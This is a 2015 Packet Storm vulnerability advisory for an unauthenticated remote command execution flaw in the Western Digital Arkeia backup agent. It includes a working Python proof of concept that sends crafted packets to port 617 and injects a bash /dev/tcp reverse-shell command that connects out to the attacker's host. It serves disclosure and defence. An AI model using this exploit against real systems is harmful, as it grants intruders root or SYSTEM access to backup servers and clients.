Western Digital Arkeia 11.0.13 Remote Code Execution

2015-07-13T00:00:00
ID PACKETSTORM:132660
Type packetstorm
Reporter xistence
Modified 2015-07-13T00:00:00

Description

                                        
                                            `## Advisory Information  
  
Title: Western Digital Arkeia "ARKFS_EXEC_CMD" <= v11.0.12 Remote Code  
Execution  
Submitter: xistence <xistence[at]0x90.nl>  
Date published: 2015-07-10  
Vendors contacted: Western Digital / Arkeia  
Class: OS Command Injection [CWE-78]  
Impact: Code execution  
Remotely Exploitable: Yes  
  
  
## Product Description  
  
The WD Arkeia network backup suite comprises WD Arkeia software's suite of  
backup-and-restore solutions. Administrators can deploy WD Arkeia's backup  
servers as software applications, hardware appliances or virtual  
appliances. WD is the first data protection company to deliver commercial  
support for all three modes of backup server deployment, including  
heterogeneous deployments.  
  
Administrators manage WD Arkeia primarily through a Web-based  
user-interface. A command-line interface provides equivalent access and is  
more suitable when scripts or customization is desired.  
  
WD Arkeia supports over 200 different physical platforms, including  
virtually all Linux and Windows platforms, as well as AIX, BSD, HP-UX, Mac  
OS X, Netware and Solaris, so you can centrally manage backups of all your  
data. We also support virtual environments with a vStorage-based agent for  
VMware vSphere and a VSS-based agent for Microsoft Hyper-V. We support  
image backups of Citrix XenServer and Parallels Server 4 Bare Metal—and  
will support image backups of RHEV as soon as Red Hat APIs make it possible.  
  
WD Arkeia provides hot backup agents for a dozen databases, applications  
agents and directory servers. We support backups to disk and to virtually  
every tape drive and tape library on the market. Arkeia even supports cloud  
storage options.  
  
  
## Vulnerability  
  
Arkeia provides an agent which can be installed on a windows/*nix system to  
make backups. This agent needs to listen on TCP port 617 on the network  
interface to allow for communication between the central Arkeia  
server/appliance and the agent.  
The agent is not only installed on the client, but also by default on the  
central Arkeia backup server/appliance.  
  
Before or after a backup session it's possible to run commands on the  
agent's system. This calls the function "ARKFS_EXEC_CMD" in the Arkeia  
communication protocol to execute a script on the remote system.  
It is however possible to bypass the authentication validation, which makes  
it possible to execute these scripts without being authenticated.  
  
The script name that's supposed to be executed can have a maximum length of  
255 bytes. Instead of scripts it's also possible to execute direct commands  
and thus makes it possible to perform remote code execution.  
  
As stated above, this allows for remote code execution on every  
workstation/server that runs the agent, including the central Arkeia backup  
server as well!  
Command execution is done with "SYSTEM" privileges on windows and "root"  
privilegs on linux/*nix.  
  
  
## Exploit  
  
Below is a simple PoC, a full exploit will be submitted to Metasploit.  
  
#!/usr/bin/python  
  
import socket, sys  
from struct import *  
  
if (len(sys.argv) != 4):  
print "[*] Usage: " + sys.argv[0] + " <IP of agent> <Own IP> <Own port>"  
print "[*] i.e.:" + sys.argv[0] + " 192.168.2.124 192.168.2.109 8888"  
print ""  
exit(0)  
  
payload1 = "\x00\x41\x00\x00\x00\x00\x00\x70" + "\x00"*12 +  
"\xc0\xa8\x02\x8a" + "\x00"*56 +  
"\x8a\x02\xa8\xc0\x41\x52\x4b\x46\x53\x00\x72\x6f\x6f\x74\x00\x72\x6f\x6f\x74\x00\x00\x00\x34\x2e\x33\x2e\x30\x2d\x31"  
+ "\x00"*11  
payload2 = "\x00\x73\x00\x00\x00\x00\x00\x0c\x32" + "\x00"*11  
payload3 =  
"\x00\x61\x00\x04\x00\x01\x00\x1a\x00\x00\x31\x33\x39\x32\x37\x31\x32\x33\x39\x38\x00\x45\x4e"  
+ "\x00"*11  
payload4 =  
"\x00\x62\x00\x01\x00\x02\x00\x1b\x41\x52\x4b\x46\x53\x5f\x45\x58\x45\x43\x5f\x43\x4d\x44\x00\x31"  
+ "\x00"*11  
  
cmd = "bash -i >& /dev/tcp/" + sys.argv[2] + "/" + sys.argv[3] + " 0>&1"  
  
# Length of command  
cmdLength = chr(len(cmd))  
  
payload5 =  
"\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c"  
+ "\x00"*12 + "\x64\x00\x04\x00\x04\x00" + cmdLength + cmd + "\x00"  
  
print "[*] - Sending payloads"  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((sys.argv[1], 617))  
  
s.send(payload1)  
s.recv(1024)  
s.send(payload2)  
s.recv(1024)  
s.send(payload3)  
s.recv(1024)  
s.send(payload4)  
s.recv(1024)  
  
print "[*] - Requesting shell"  
s.send(payload5)  
s.recv(1024)  
s.close()  
  
  
## Solution  
  
No fix available (yet) from vendor.  
Recommended workaround: Firewall access to TCP port 617 where possible  
  
  
## Disclosure Timeline  
  
2015-01-07 - Contacted vendor with vulnerability information  
2015-01-07 - Vendor responded that they will investigate the issue  
2015-01-27 - Requested status update  
2015-01-27 - Vendor responded that issue has been escalated  
2015-02-25 - Requested status update  
2015-03-13 - Vendor responded that case is still open and further  
information will be provided later  
2015-05-11 - Requested status update  
2015-xx-xx - No response from vendor  
2015-05-26 - Requested status update  
2015-xx-xx - No response from vendor  
2015-07-10 - Public disclosure of vulnerability  
  
  
`